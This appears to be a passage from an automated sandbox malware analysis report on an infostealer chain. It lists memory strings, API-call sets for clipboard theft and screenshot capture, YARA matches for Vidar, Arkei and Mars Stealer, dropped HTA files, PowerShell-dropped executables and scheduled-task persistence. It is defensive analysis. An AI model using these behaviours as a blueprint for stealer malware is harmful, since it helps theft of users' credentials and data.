                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816453607.000001E16B538000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1884450015.000001E16B539000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1814171740.000001E16B51C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1839236500.000001E16B56B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1884778841.000001E16BC1D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807134122.000001E16BC19000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1779310228.000001E16BBEB000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813939975.000001E16B562000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1863172789.000001E16B56F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880210684.000001E16BC1A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880906094.000001E16B582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                                      Source: trano1221.exe, 0000002A.00000003.1779310228.000001E16BBEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1882675982.000001E16BAB0000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1717851242.000001E16BA15000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1858813276.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1717851242.000001E16BA6C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
                                      Source: UD49QH6.exe, 00000010.00000003.1462695917.0000000005B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                                      Source: trano1221.exe, 00000023.00000003.1604145252.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
                                      Source: trano1221.exe, 00000023.00000003.1604145252.0000013C2C401000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1604306017.0000013C2C402000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1604145252.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                                      Source: UD49QH6.exe, 00000010.00000003.1450202345.0000000005B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                                      Source: UD49QH6.exe, 00000010.00000003.1450202345.0000000005B90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                                      Source: m0wsoI3.exe, 00000011.00000002.1531427752.0000000010285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                      Source: m0wsoI3.exe, 00000011.00000003.1501994471.000000000F41E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                                      Source: m0wsoI3.exe, 00000011.00000002.1531427752.0000000010285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                      Source: m0wsoI3.exe, 00000011.00000003.1501994471.000000000F41E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                                      Source: m0wsoI3.exe, 00000011.00000003.1501994471.000000000F41E000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1531427752.0000000010285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                      Source: m0wsoI3.exe, 00000011.00000002.1531427752.0000000010285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                                      Source: UD49QH6.exe, 00000010.00000003.1449386649.0000000005E8D000.00000004.00000800.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000003.1501994471.000000000F41E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                      Source: trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1984742205.00007FF98C2B7000.00000004.00000001.01000000.0000002C.sdmp, trano1221.exe, 0000002A.00000002.1980746377.00007FF98BDB8000.00000004.00000001.01000000.0000002D.sdmpString found in binary or memory: https://www.openssl.org/H
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
                                      Source: trano1221.exe, 0000002A.00000003.1894885445.000001E16BC08000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813822027.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1831036072.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1779310228.000001E16BBEB000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1871438491.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1881267013.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1882569817.000001E16BC07000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1815421865.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1882379108.000001E16BBFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
                                      Source: trano1221.exe, 0000002A.00000002.1933157269.000001E16AE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                                      Source: trano1221.exe, 0000002A.00000002.2006486368.00007FF98E808000.00000040.00000001.01000000.0000001C.sdmpString found in binary or memory: https://www.python.org/psf/license/
                                      Source: trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
                                      Source: trano1221.exe, 0000002A.00000003.1882675982.000001E16BAC9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1885930845.000001E16BAC9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1942810073.000001E16B58C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1822487423.000001E16B586000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1946483979.000001E16BAEA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1885930845.000001E16BAE8000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880906094.000001E16B58C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813939975.000001E16B562000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806059046.000001E16BAE5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1883906457.000001E16BAE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006BEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,18_2_006BEAFF
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006BED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,18_2_006BED6A
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006BEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,18_2_006BEAFF
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_009461F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,13_2_009461F0
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006AAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,18_2_006AAA57
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006D9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,18_2_006D9576

                                      System Summary

                                      barindex
                                      Malicious sample detected (through community Yara rule)
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detect Mars Stealer based on a specific XOR routine Author: Sekoia.io
                                      Source: 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                                      Source: 00000011.00000002.1518022147.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
                                      Source: Process Memory Space: m0wsoI3.exe PID: 5132, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                                      Source: decrypted.memstr, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                                      Source: decrypted.memstr, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                                      Binary is likely a compiled AutoIt script file
                                      Source: 8e933e9d51.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                                      Source: 8e933e9d51.exe, 00000012.00000002.1531510429.0000000000702000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8ef64bd3-5
                                      Source: 8e933e9d51.exe, 00000012.00000002.1531510429.0000000000702000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d306c521-6
                                      Creates HTA files
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeFile created: C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta
                                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Temp\J9hHfTRUK.hta
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeFile created: C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta
                                      PE file contains section with special chars
                                      Source: M6gQuZPvgY.exeStatic PE information: section name:
                                      Source: M6gQuZPvgY.exeStatic PE information: section name: .idata
                                      Source: M6gQuZPvgY.exeStatic PE information: section name:
                                      Source: rapes.exe.0.drStatic PE information: section name:
                                      Source: rapes.exe.0.drStatic PE information: section name: .idata
                                      Source: rapes.exe.0.drStatic PE information: section name:
                                      Source: UD49QH6[1].exe.6.drStatic PE information: section name:
                                      Source: UD49QH6[1].exe.6.drStatic PE information: section name: .idata
                                      Source: UD49QH6[1].exe.6.drStatic PE information: section name:
                                      Source: UD49QH6.exe.6.drStatic PE information: section name:
                                      Source: UD49QH6.exe.6.drStatic PE information: section name: .idata
                                      Source: UD49QH6.exe.6.drStatic PE information: section name:
                                      Source: random[1].exe0.6.drStatic PE information: section name:
                                      Source: random[1].exe0.6.drStatic PE information: section name: .idata
                                      Source: random[1].exe0.6.drStatic PE information: section name:
                                      Source: c1f0508103.exe.6.drStatic PE information: section name:
                                      Source: c1f0508103.exe.6.drStatic PE information: section name: .idata
                                      Source: c1f0508103.exe.6.drStatic PE information: section name:
                                      Source: random[2].exe.6.drStatic PE information: section name:
                                      Source: random[2].exe.6.drStatic PE information: section name: .idata
                                      Source: random[2].exe.6.drStatic PE information: section name:
                                      Source: 83f34278c7.exe.6.drStatic PE information: section name:
                                      Source: 83f34278c7.exe.6.drStatic PE information: section name: .idata
                                      Source: 83f34278c7.exe.6.drStatic PE information: section name:
                                      Source: random[1].exe1.6.drStatic PE information: section name:
                                      Source: random[1].exe1.6.drStatic PE information: section name: .idata
                                      Source: random[1].exe1.6.drStatic PE information: section name:
                                      Source: 0629403be8.exe.6.drStatic PE information: section name:
                                      Source: 0629403be8.exe.6.drStatic PE information: section name: .idata
                                      Source: 0629403be8.exe.6.drStatic PE information: section name:
                                      Source: random[1].exe2.6.drStatic PE information: section name:
                                      Source: random[1].exe2.6.drStatic PE information: section name: .idata
                                      Source: random[1].exe2.6.drStatic PE information: section name:
                                      Source: d101bd5267.exe.6.drStatic PE information: section name:
                                      Source: d101bd5267.exe.6.drStatic PE information: section name: .idata
                                      Source: d101bd5267.exe.6.drStatic PE information: section name:
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.drStatic PE information: section name:
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.drStatic PE information: section name: .idata
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.drStatic PE information: section name:
                                      PE file has a writeable .text section
                                      Source: m0wsoI3[1].exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      Source: m0wsoI3.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      PE file has nameless sections
                                      Source: m0wsoI3[1].exe.6.drStatic PE information: section name:
                                      Source: m0wsoI3.exe.6.drStatic PE information: section name:
                                      Powershell drops PE file
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEJump to dropped file
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\TempLFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXEJump to dropped file
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006AD5EB: CreateFileW,DeviceIoControl,CloseHandle,18_2_006AD5EB
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006A1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,18_2_006A1201
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006AE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,18_2_006AE8F6
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeFile created: C:\Windows\Tasks\rapes.jobJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile created: C:\Windows\Tasks\futors.jobJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\Windows\SysWOW64\Z58QQI5P
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\Windows\SysWOW64\7YMOHDTJ
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\Windows\SysWOW64\HVKNYMGD
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\Windows\SysWOW64\SR1N7QIE
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\Windows\SysWOW64\EKNG4EUS
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\Windows\SysWOW64\Y58Q9ZM7
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\Windows\SysWOW64\3OH479ZM
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\Windows\SysWOW64\00HDTR9Z
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile deleted: C:\Windows\SysWOW64\Z58QQI5P
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_009461F013_2_009461F0
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0098404713_2_00984047
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0097C6DD13_2_0097C6DD
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_00972C2013_2_00972C20
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_00944EF013_2_00944EF0
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0097CE6913_2_0097CE69
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_009451A013_2_009451A0
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0096B4C013_2_0096B4C0
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0094545013_2_00945450
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0096F6DB13_2_0096F6DB
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_009818D713_2_009818D7
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_00985CD413_2_00985CD4
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_00985DF413_2_00985DF4
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_0042404714_2_00424047
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_003E61F014_2_003E61F0
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_0041C6DD14_2_0041C6DD
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_00412C2014_2_00412C20
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_0041CE6914_2_0041CE69
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_003E4EF014_2_003E4EF0
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_003E51A014_2_003E51A0
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_003E545014_2_003E5450
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_0040B4C014_2_0040B4C0
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_0040F6DB14_2_0040F6DB
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_004218D714_2_004218D7
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_00425CD414_2_00425CD4
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_00425DF414_2_00425DF4
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_0041B02017_2_0041B020
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_00410F0017_2_00410F00
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_0041A79017_2_0041A790
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_0041A19017_2_0041A190
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_0041A5A017_2_0041A5A0
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_004107B017_2_004107B0
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6095C31417_2_6095C314
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6094DA3A17_2_6094DA3A
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_609660FA17_2_609660FA
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6092114F17_2_6092114F
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6091F2C917_2_6091F2C9
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6096923E17_2_6096923E
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6093323D17_2_6093323D
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6095031217_2_60950312
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6094D33B17_2_6094D33B
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6093B36817_2_6093B368
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6096748C17_2_6096748C
